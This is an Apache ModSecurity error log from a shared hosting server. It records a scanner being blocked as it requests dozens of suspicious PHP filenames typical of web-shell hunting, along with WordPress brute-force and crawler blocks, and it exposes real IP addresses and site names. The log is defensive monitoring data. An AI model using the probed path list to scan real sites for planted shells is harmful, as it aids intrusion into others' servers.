[Tue May 26 19:15:11.453509 2026] [security2:error] [pid 26857:tid 27044] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahWj59foqtHEG_e9i6GqWQAAvis"]
[Tue May 26 19:15:11.610142 2026] [security2:error] [pid 26857:tid 26892] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/file.php"] [unique_id "ahWj59foqtHEG_e9i6GqWgAAvSI"]
[Tue May 26 19:15:11.610444 2026] [security2:error] [pid 26857:tid 27043] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/file.php"] [unique_id "ahWj59foqtHEG_e9i6GqWgAAvSI"]
[Tue May 26 19:15:11.700662 2026] [security2:error] [pid 26857:tid 26895] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cfile.php"] [unique_id "ahWj59foqtHEG_e9i6GqYwAA7iU"]
[Tue May 26 19:15:11.700820 2026] [security2:error] [pid 26857:tid 27092] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cfile.php"] [unique_id "ahWj59foqtHEG_e9i6GqYwAA7iU"]
[Tue May 26 19:15:11.923668 2026] [security2:error] [pid 26857:tid 26900] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/class-wp.php"] [unique_id "ahWj59foqtHEG_e9i6GqcQAAjio"]
[Tue May 26 19:15:11.923851 2026] [security2:error] [pid 26857:tid 26996] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/class-wp.php"] [unique_id "ahWj59foqtHEG_e9i6GqcQAAjio"]
[Tue May 26 19:15:12.020216 2026] [security2:error] [pid 26857:tid 26907] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ahax.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqcgAA6DE"]
[Tue May 26 19:15:12.020466 2026] [security2:error] [pid 26857:tid 27086] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ahax.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqcgAA6DE"]
[Tue May 26 19:15:12.249390 2026] [security2:error] [pid 26857:tid 26909] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/aa2.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqhAAAsTM"]
[Tue May 26 19:15:12.249600 2026] [security2:error] [pid 26857:tid 27031] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/aa2.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqhAAAsTM"]
[Tue May 26 19:15:12.266838 2026] [security2:error] [pid 26857:tid 27089] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj59foqtHEG_e9i6GqbQAAAOs"]
[Tue May 26 19:15:12.648474 2026] [autoindex:error] [pid 26857:tid 27009] [client 20.17.160.149:53346] AH01276: Cannot serve directory /home2/debatqhn/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:15:12.710450 2026] [security2:error] [pid 26857:tid 26912] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ccou.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqoAAAvzY"]
[Tue May 26 19:15:12.710666 2026] [security2:error] [pid 26857:tid 27045] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ccou.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqoAAAvzY"]
[Tue May 26 19:15:12.804117 2026] [security2:error] [pid 26857:tid 26910] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/login8.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqpwAAyTQ"]
[Tue May 26 19:15:12.804338 2026] [security2:error] [pid 26857:tid 27055] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/login8.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqpwAAyTQ"]
[Tue May 26 19:15:13.097887 2026] [security2:error] [pid 26857:tid 26924] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/nx.php"] [unique_id "ahWj6dfoqtHEG_e9i6GqvQAA-EI"]
[Tue May 26 19:15:13.098054 2026] [security2:error] [pid 26857:tid 27102] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/nx.php"] [unique_id "ahWj6dfoqtHEG_e9i6GqvQAA-EI"]
[Tue May 26 19:15:13.352225 2026] [security2:error] [pid 26857:tid 26927] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/dr.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq0AAA2UU"]
[Tue May 26 19:15:13.352437 2026] [security2:error] [pid 26857:tid 27071] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/dr.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq0AAA2UU"]
[Tue May 26 19:15:13.378951 2026] [security2:error] [pid 26857:tid 27052] [client 102.164.188.174:11705] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWj6NfoqtHEG_e9i6GqjgAAxjk"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=26&datepmonth=5&datepyear=2026
[Tue May 26 19:15:13.566509 2026] [security2:error] [pid 26857:tid 26933] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xamp.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq2wAA_Es"]
[Tue May 26 19:15:13.566800 2026] [security2:error] [pid 26857:tid 27106] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xamp.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq2wAA_Es"]
[Tue May 26 19:15:13.591656 2026] [security2:error] [pid 26857:tid 26928] [remote 67.23.237.2:40126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq0QAA4UY"]
[Tue May 26 19:15:13.595481 2026] [security2:error] [pid 26857:tid 27076] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj6dfoqtHEG_e9i6GqwwAAAN4"]
[Tue May 26 19:15:13.754427 2026] [security2:error] [pid 26857:tid 26925] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq6gAAyUM"]
[Tue May 26 19:15:13.754585 2026] [security2:error] [pid 26857:tid 27055] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq6gAAyUM"]
[Tue May 26 19:15:13.901790 2026] [security2:error] [pid 26857:tid 26923] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/clas11.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq8gAArkE"]
[Tue May 26 19:15:13.901972 2026] [security2:error] [pid 26857:tid 27028] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/clas11.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq8gAArkE"]
[Tue May 26 19:15:14.024064 2026] [security2:error] [pid 26857:tid 26926] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/cxl.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrAgAA8EQ"]
[Tue May 26 19:15:14.024238 2026] [security2:error] [pid 26857:tid 27094] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/cxl.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrAgAA8EQ"]
[Tue May 26 19:15:14.287792 2026] [security2:error] [pid 26857:tid 26944] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/bb.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrDwAAi1Y"]
[Tue May 26 19:15:14.287994 2026] [security2:error] [pid 26857:tid 26993] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/bb.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrDwAAi1Y"]
[Tue May 26 19:15:14.482836 2026] [security2:error] [pid 26857:tid 26946] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/dtox.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrGQAA0Fg"]
[Tue May 26 19:15:14.483010 2026] [security2:error] [pid 26857:tid 27062] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/dtox.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrGQAA0Fg"]
[Tue May 26 19:15:14.626528 2026] [security2:error] [pid 26857:tid 26936] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/eee.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrLAAA9k4"]
[Tue May 26 19:15:14.626807 2026] [security2:error] [pid 26857:tid 27100] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/eee.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrLAAA9k4"]
[Tue May 26 19:15:14.672670 2026] [security2:error] [pid 26857:tid 27010] [client 107.172.59.122:52453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWj6dfoqtHEG_e9i6Gq7QAAAJw"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 19:15:14.807301 2026] [security2:error] [pid 26857:tid 26960] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/5BltUjE9CrY.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrMwAA42Y"]
[Tue May 26 19:15:14.807491 2026] [security2:error] [pid 26857:tid 27081] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/5BltUjE9CrY.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrMwAA42Y"]
[Tue May 26 19:15:14.997229 2026] [security2:error] [pid 26857:tid 27021] [client 114.119.138.130:51227] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWj6tfoqtHEG_e9i6GrOwAAAKc"], referer: https://stepupstore.be/maximizando-ganhos-no-stake-casino-com-estrategias-probabilisticas
[Tue May 26 19:15:15.019961 2026] [security2:error] [pid 26857:tid 27057] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj6tfoqtHEG_e9i6GrKQAAAMs"]
[Tue May 26 19:15:15.796151 2026] [security2:error] [pid 26857:tid 26973] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/come.php"] [unique_id "ahWj69foqtHEG_e9i6GraQAApXM"]
[Tue May 26 19:15:15.796923 2026] [security2:error] [pid 26857:tid 27019] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/come.php"] [unique_id "ahWj69foqtHEG_e9i6GraQAApXM"]
[Tue May 26 19:15:15.901962 2026] [security2:error] [pid 26857:tid 26949] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/hg.php"] [unique_id "ahWj69foqtHEG_e9i6GrbgAAnVs"]
[Tue May 26 19:15:15.902131 2026] [security2:error] [pid 26857:tid 27011] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/hg.php"] [unique_id "ahWj69foqtHEG_e9i6GrbgAAnVs"]
[Tue May 26 19:15:16.018993 2026] [security2:error] [pid 26857:tid 26958] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/aaa.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrdgAArmQ"]
[Tue May 26 19:15:16.019156 2026] [security2:error] [pid 26857:tid 27028] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/aaa.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrdgAArmQ"]
[Tue May 26 19:15:16.141814 2026] [security2:error] [pid 26857:tid 26974] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/at.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrggAAwXQ"]
[Tue May 26 19:15:16.141998 2026] [security2:error] [pid 26857:tid 27047] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/at.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrggAAwXQ"]
[Tue May 26 19:15:16.478643 2026] [security2:error] [pid 26857:tid 26969] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/ff.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrkgAA0m8"]
[Tue May 26 19:15:16.478858 2026] [security2:error] [pid 26857:tid 27064] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/ff.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrkgAA0m8"]
[Tue May 26 19:15:16.600673 2026] [security2:error] [pid 26857:tid 26868] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/file31.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrmQAA6go"]
[Tue May 26 19:15:16.600846 2026] [security2:error] [pid 26857:tid 27088] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/file31.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrmQAA6go"]
[Tue May 26 19:15:16.691350 2026] [security2:error] [pid 26857:tid 26858] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/Crypto.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrmgAA3QA"]
[Tue May 26 19:15:16.691533 2026] [security2:error] [pid 26857:tid 27075] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/Crypto.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrmgAA3QA"]
[Tue May 26 19:15:16.794094 2026] [security2:error] [pid 26857:tid 26977] [remote 67.23.237.2:40126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWj7NfoqtHEG_e9i6GroQAAlnc"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:15:16.808679 2026] [security2:error] [pid 26857:tid 26978] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/firewall.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrowAA63g"]
[Tue May 26 19:15:16.808847 2026] [security2:error] [pid 26857:tid 27089] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/firewall.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrowAA63g"]
[Tue May 26 19:15:16.933452 2026] [security2:error] [pid 26857:tid 26861] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/pi.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrqQAAkwM"]
[Tue May 26 19:15:16.933670 2026] [security2:error] [pid 26857:tid 27001] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/pi.php"] [unique_id "ahWj7NfoqtHEG_e9i6GrqQAAkwM"]
[Tue May 26 19:15:17.058691 2026] [security2:error] [pid 26857:tid 26860] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/testphp.php"] [unique_id "ahWj7dfoqtHEG_e9i6GrsAAAhgI"]
